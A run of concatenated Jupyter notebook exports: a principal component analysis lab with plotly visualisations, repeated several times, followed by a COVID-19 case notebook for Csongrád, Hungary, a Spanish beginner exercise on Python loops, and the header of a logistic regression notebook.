camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
###Markdown
Lab 10 - Principal Component AnalysisThe purpose of the following lab is to investigate the work of the PCA algorithm on a set of 3 datasets- Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances.- Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$- A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCALet us begin with visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that though it is represented in a 3 dimensional space, it is mostly described along some 2 dimensional space. Looking at the PCs, and specifically at their size and width, we get an understandment of "how much" of the data is spread in each direction.Rotate Figure 1 to view the data in two ways. Firstly view the data in an angle perpendicular to both PC1 and PC2. This will be the angle that the data has the largest amount of spread in a 2 dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data in an angle perpendicular to PC3. In this direction of the 3 dimentional space we are not able to get a clear view of the main trends of the data. We merly observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how is the data spread across the three computed PCs, let us project it onto them (Figure 2). To do so let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs then $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower DimensionSo we have seen that the PCA algorithm provides us with an orthonormal basis, with a desired properly that the directions correspond with the amount of spread the data shows in that direction.Recall that as the algorithm provided an orthonormal basis then we can represent each sample $\mathbf{x}_i$ as a linear composition of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$When we project onto the $k<d$ subspace the summation is only using the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = U^\top\left(\mathbf{X}U\right)$ where $U\in\mathbb{R}^{d\times k}$.*For deductive reasons in the code below we take the transformed (projected) data, zero the last dimensions and then perform the multiplication by $U$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Enbedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked between the different PCs and how much does the data "spread" in each PC direction. This spread is the variance (as in variance of random variables) of the data in the current direction.We have seen that the subspace found by the PCA algorithm is the subspace of some degree $k$ that retains the maximum variance out of all $k$ dimensional subspace. In the proof itself the link between the variance, the principal components and the singular values becomes evident: If we search for a vector onto which we orthogonally project the data and that this vector maximizes the variance of the projected data then: - This vector, which we name as a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space, satisfying the above but also is perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance. That is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the singular values of the original data matrix squared) then:
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=pca.singular_values_, marker_color = color_scheme),
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____ |
ipynb/Hungary-Csongrád.ipynb | ###Markdown
Hungary: Csongrád* Homepage of project: https://oscovida.github.io* Plots are explained at http://oscovida.github.io/plots.html* [Execute this Jupyter Notebook using myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Hungary-Csongrád.ipynb)
###Code
import datetime
import time
start = datetime.datetime.now()
print(f"Notebook executed on: {start.strftime('%d/%m/%Y %H:%M:%S%Z')} {time.tzname[time.daylight]}")
%config InlineBackend.figure_formats = ['svg']
from oscovida import *
overview(country="Hungary", region="Csongrád", weeks=5);
overview(country="Hungary", region="Csongrád");
compare_plot(country="Hungary", region="Csongrád");
# load the data
cases, deaths = get_region_hungary(county="Csongrád")
# get population of the region for future normalisation:
inhabitants = population(country="Hungary", region="Csongrád")
print(f'Population of country="Hungary", region="Csongrád": {inhabitants} people')
# compose into one table
table = compose_dataframe_summary(cases, deaths)
# show tables with up to 1000 rows
pd.set_option("max_rows", 1000)
# display the table
table
###Output
_____no_output_____
###Markdown
Explore the data in your web browser- If you want to execute this notebook, [click here to use myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Hungary-Csongrád.ipynb)- and wait (~1 to 2 minutes)- Then press SHIFT+RETURN to advance code cell to code cell- See http://jupyter.org for more details on how to use Jupyter Notebook Acknowledgements:- Johns Hopkins University provides data for countries- Robert Koch Institute provides data for within Germany- Atlo Team for gathering and providing data from Hungary (https://atlo.team/koronamonitor/)- Open source and scientific computing community for the data tools- Github for hosting repository and html files- Project Jupyter for the Notebook and binder service- The H2020 project Photon and Neutron Open Science Cloud ([PaNOSC](https://www.panosc.eu/))--------------------
###Code
print(f"Download of data from Johns Hopkins university: cases at {fetch_cases_last_execution()} and "
f"deaths at {fetch_deaths_last_execution()}.")
# to force a fresh download of data, run "clear_cache()"
print(f"Notebook execution took: {datetime.datetime.now()-start}")
###Output
_____no_output_____ |
kata7.ipynb | ###Markdown
En este ejercicio, estás creando una aplicación que solicita a un usuario que ingrese una lista de planetas. En un ejercicio posterior, agregarás código que muestre la lista. Por ahora, crearás solo el código que solicita al usuario la lista de planetas.Comienza agregando dos variables, una para la entrada del usuario, con el nombre new_planet, y otra variable para la lista de planetas, denominada planets.
###Code
# Creamos la variable que almacena el texto
user_planetas = ''
# Creamos la lista que almacena cada uno de los textos que el usuario ingresa
planetas = []
# Ciclo while
while user_planetas.lower() != 'done':
# Verificamos si hay un valor en user_planetas
if user_planetas:
# Almacenamos ese valor en la lista
planetas.append(user_planetas)
# Capturamos un nuevo valor
user_planetas = input('Enter a new value, or done when done')
print(planetas)
###Output
[]
['tierra']
['tierra', 'venus']
['tierra', 'venus', 'saturno']
###Markdown
Ejercicio: - Ciclo para una listaEn el ejercicio anterior, creaste código para solicitar a los usuarios que introduzcan una lista de nombres de planetas. En este ejercicio, completarás la aplicación escribiendo código que muestre los nombres de esos planetas.
###Code
# Creamos la variable que almacena el texto
user_planetas = ''
# Creamos la lista que almacena cada uno de los textos que el usuario ingresa
planetas = []
# Ciclo while
while user_planetas.lower() != 'done':
# Verificamos si hay un valor en user_planetas
if user_planetas:
# Almacenamos ese valor en la lista
planetas.append(user_planetas)
# Capturamos un nuevo valor
user_planetas = input('Enter a new value, or done when done')
for planeta in planetas:
print(planeta)
###Output
mercurio
venus
tierra
###Markdown
Ejercicio 1: Creación de un bucle "while"En Python, los ciclos while te permiten ejecutar código un número desconocido de veces. Los ciclos examinan una condición booleana y, siempre que la condición sea verdadera, se ejecutará el código dentro del ciclo. Esto es muy útil para situaciones como solicitar valores a un usuario.En este ejercicio, estás creando una aplicación que solicita a un usuario que ingrese una lista de planetas. En un ejercicio posterior, agregarás código que muestre la lista. Por ahora, crearás solo el código que solicita al usuario la lista de planetas.
###Code
from tabulate import tabulate
planeta = [];
print("Ingresa nombres de planetas para agregarlos a una lista, ingresa la palabra 'done' para finalizar el programa.");
nuevo_planeta = input("Introduce el nombre de un planeta:");
nplanet=nuevo_planeta.lower();
planeta.append(nplanet);
while(nplanet != 'done'):
nuevo_planeta = input("Introduce el nombre de un planeta:");
nplanet=nuevo_planeta.lower();
planeta.append(nuevo_planeta);
#print(tabulate(planeta));
###Output
Ingresa nombres de planetas para agregarlos a una lista, ingresa la palabra 'done' para finalizar el programa.
###Markdown
Ejercicio 2: Creación de un ciclo "for"En el ejercicio anterior, creaste código para solicitar a los usuarios que introduzcan una lista de nombres de planetas. En este ejercicio, completarás la aplicación escribiendo código que muestre los nombres de esos planetas.Mostrar la lista de los planetasLa variable planets almacena los nombres de planeta que ha introducido un usuario. Ahora usarás un ciclo para mostrar esas entradas.
###Code
for i in planeta:
print(i);
###Output
mercurio
venus
tierrs
DOne
|
LAB 7/LogisticRegression-Tweets.ipynb | ###Markdown
